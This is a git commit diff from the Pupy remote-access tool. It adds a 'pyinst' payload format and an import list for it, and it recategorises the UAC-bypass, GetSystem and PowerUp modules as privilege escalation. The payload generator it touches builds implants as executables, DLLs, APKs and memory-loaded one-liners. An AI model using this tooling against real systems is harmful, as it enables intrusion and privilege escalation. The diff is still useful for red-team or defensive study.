Merge remote-tracking branch 'upstream/master'

This commit is contained in:
Alessandro ZANNI 2016-07-28 17:51:15 +02:00
commit ef36a137ea
7 changed files with 96 additions and 11 deletions

75
pupy/conf/imports_done.py Normal file
View File

@ -0,0 +1,75 @@
from collections import OrderedDict
from Crypto.Cipher import AES
from Crypto.Hash import HMAC
from Crypto.Hash import SHA256
from Crypto.Hash import SHA256, HMAC
from Crypto import Random
from Crypto.Protocol.KDF import PBKDF2
from Crypto.Util import Counter
from cStringIO import StringIO
from itertools import izip, starmap
from operator import xor
from StringIO import StringIO
from struct import Struct
import argparse
import base64
import binascii
import bz2
import code
import collections
import configparser
import copy
import cPickle
import Crypto.Cipher
import Crypto.Cipher.AES
import Crypto.Hash.HMAC
import Crypto.Hash.SHA256
import Crypto.Util.Counter
import datetime
import errno, stat
import fractions
import __future__
import getpass
import glob
import hashlib
import hmac
import imp
import importlib
import inspect
import json
import logging
import math
import multiprocessing
import new
import os
import pkgutil
import platform
import Queue
import random
import re
import rsa
import shlex
import shutil
import site
import socket
import SocketServer
import ssl
import string
import StringIO
import struct
import subprocess
import sys
import tempfile
import threading
import time
import traceback
import urllib
import urllib2
import uuid
import yaml
import zlib
if os.name == 'nt':
import ctypes
import ctypes.wintypes
if os.name == 'posix':
import pty

View File

@ -8,7 +8,7 @@ __class_name__="BypassUAC"
ROOT=os.path.abspath(os.path.join(os.path.dirname(__file__),"..",".."))
@config(compat="windows", category="exploit")
@config(compat="windows", category="privesc")
class BypassUAC(PupyModule):
""" try to bypass UAC with Invoke-BypassUAC.ps1, from Empire """
dependencies=["psutil", "pupwinutils.processes"]

View File

@ -4,7 +4,7 @@ from pupylib.utils.rpyc_utils import redirected_stdo
from modules.lib.windows.migrate import migrate
__class_name__="GetSystem"
@config(compat="windows", category="exploit")
@config(compat="windows", category="privesc")
class GetSystem(PupyModule):
""" try to get NT AUTHORITY SYSTEM privileges """
dependencies=["psutil", "pupwinutils.security"]

View File

@ -6,7 +6,7 @@ from modules.lib.windows.powershell_upload import execute_powershell_script
__class_name__="PowerUp"
ROOT=os.path.abspath(os.path.join(os.path.dirname(__file__),".."))
@config(compat="windows", category="admin")
@config(compat="windows", category="privesc")
class PowerUp(PupyModule):
""" trying common Windows privilege escalation methods"""
@ -23,4 +23,4 @@ class PowerUp(PupyModule):
# parse output depending on the PowerUp output
output = output.replace('\r\n\r\n\r\n', '\r\n\r\n').replace("\n\n", "\n").replace("\n\n", "\n")
self.success("%s" % output)
self.success("%s" % output)

View File

@ -7,7 +7,7 @@ import logging, argparse, sys, os.path, re, shlex, random, string, zipfile, tarf
from pupylib.utils.network import get_local_ip
from pupylib.utils.term import colorize
from pupylib.payloads.python_packer import gen_package_pickled_dic
from pupylib.payloads.py_oneliner import serve_payload, pack_py_payload
from pupylib.payloads.py_oneliner import serve_payload, pack_py_payload, getLinuxImportedModules
from pupylib.utils.obfuscate import compress_encode_obfs
from network.conf import transports, launchers
from network.lib.base_launcher import LauncherError
@ -236,6 +236,7 @@ class ListOptions(argparse.Action):
print "\t- exe_86, exe_x64 : generate PE exe for windows"
print "\t- dll_86, dll_x64 : generate reflective dll for windows"
print "\t- py : generate a fully packaged python file (with all the dependencies packaged and executed from memory), all os (need the python interpreter installed)"
print "\t- pyinst : generate a python file compatible with pyinstaller"
print "\t- py_oneliner : same as \"py\" format but served over http to load it from memory with a single command line."
print "\t- ps1_oneliner : load pupy remotely from memory with a single command line using powershell."
@ -254,7 +255,7 @@ class ListOptions(argparse.Action):
print '\n'.join(["\t"+x for x in sc.get_help().split("\n")])
exit()
PAYLOAD_FORMATS=['apk', 'exe_x86', 'exe_x64', 'dll_x86', 'dll_x64', 'py', 'py_oneliner', 'ps1_oneliner']
PAYLOAD_FORMATS=['apk', 'exe_x86', 'exe_x64', 'dll_x86', 'dll_x64', 'py', 'pyinst', 'py_oneliner', 'ps1_oneliner']
if __name__=="__main__":
if os.path.dirname(__file__):
os.chdir(os.path.dirname(__file__))
@ -331,12 +332,15 @@ if __name__=="__main__":
if not outpath:
outpath="pupy.apk"
get_edit_apk(os.path.join("payload_templates","pupy.apk"), outpath, conf)
elif args.format=="py":
elif args.format=="py" or args.format=="pyinst":
linux_modules = ""
if not outpath:
outpath="payload.py"
if args.format=="pyinst" :
linux_modules = getLinuxImportedModules()
packed_payload=pack_py_payload(get_raw_conf(conf))
with open(outpath, 'wb') as w:
w.write("#!/usr/bin/env python\n# -*- coding: UTF8 -*-\n"+packed_payload)
w.write("#!/usr/bin/env python\n# -*- coding: UTF8 -*-\n"+linux_modules+"\n"+packed_payload)
elif args.format=="py_oneliner":
packed_payload=pack_py_payload(get_raw_conf(conf))
i=conf["launcher_args"].index("--host")+1

View File

@ -4,5 +4,5 @@
# Pupy is under the BSD 3-Clause license. see the LICENSE file at the root of the project for the detailed licence terms
#authorized categories
categories=["general", "manage", "admin", "exploit", "network", "gather", "troll", "misc"]
categories=["general", "manage", "admin", "exploit", "privesc", "network", "gather", "troll", "misc"]

View File

@ -13,6 +13,14 @@ from pupylib.payloads.python_packer import get_load_module_code, gen_package_pic
ROOT=os.path.abspath(os.path.join(os.path.dirname(__file__),"..",".."))
def getLinuxImportedModules():
'''
'''
lines = ""
with open(os.path.join(ROOT,"conf","imports_done.py")) as f:
lines=f.read()
return lines
def pack_py_payload(conf):
print colorize("[+] ","green")+"generating payload ..."
fullpayload=[]
@ -74,5 +82,3 @@ def serve_payload(payload, ip="0.0.0.0", port=8080, link_ip="<your_ip>"):
print 'KeyboardInterrupt received, shutting down the web server'
server.socket.close()
exit()